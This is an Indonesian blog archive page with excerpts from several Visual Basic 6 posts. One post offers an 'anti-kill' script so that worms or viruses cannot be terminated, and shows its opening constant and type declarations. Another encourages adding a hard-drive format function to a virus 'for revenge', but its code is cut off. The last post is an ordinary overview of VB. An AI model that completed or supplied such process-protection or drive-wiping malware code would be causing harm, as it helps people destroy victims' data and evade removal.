Blog Archives

Bikin VB Portable Sendiri

Hm, ada yang pengen buat VB Portable sendiri? nih saya kasih tau caranya, hehe. Abis browsing – browsing di mbah google , eh dapet artikel ini, yaudah saya post aja di sini. Okelah ga pake basa – basi langsung aja kita ke TKP (hehe)
Yang dimaksud dengan aplikasi portable berarti tuw aplikasi bisa digunakan tanpa proses intall yang biasa kita gunakan, jd tuw file dapat dibawa kemana-mana dengan menggunakan flashdisk dan ukurannya yang lebih kecil menjadi lebih efektif. VB yang akan dibikin portable ini tidak menyertakan seluruh file system atau file-file komponennya, sehingga bisa menjadi lebih kecil. VB yang dibikin ini hanya cukup untuk membuka program VB dan mengedit source code, serta membuat file .exe . . . Okee sekian penjelasan tentang ne program portable yang akan dibuat, sekarang ikuti langkah-langkah berikut untuk membuat “VB portbale”
Read the rest of this entry

Advertisements

Bikin Malware Anti Kill

Hm, masih pengen coding? masih pengen bikin worm? ato virus? mao bikin virus ato worm yang ga bisa di kill proccess nya? oke nih saya kasih script anti kill

Option Explicit

Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4

Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type Read the rest of this entry

Memformat Harddisk Menggunakan VB 6.0

Mau kejam buat virus ? percuma kalo gak ditambahi fungsi format drive, walpun ini menyalahi aturan, tapi kalo buat bales dendam sekali – kali ga apa apa lah. Hehehe

Berikut adalah caranya

Buatlah projek Vb dengan 1 Form dan 1 CommandButton dan 1 Dr

Coding dalam form Read the rest of this entry

Microsoft Visual BASIC Programming Language

Visula BAsicMicrosoft Visual Basic (sering disingkat sebagai VB saja) merupakan sebuah bahasa pemrograman yang bersifat event driven dan menawarkan Integrated Development Environment (IDE) visual untuk membuat program aplikasi berbasis sistem operasi Microsoft Windows dengan menggunakan model pemrograman Common Object Model (COM). Visual Basic merupakan turunan bahasa BASIC dan menawarkan pengembangan aplikasi komputer Read the rest of this entry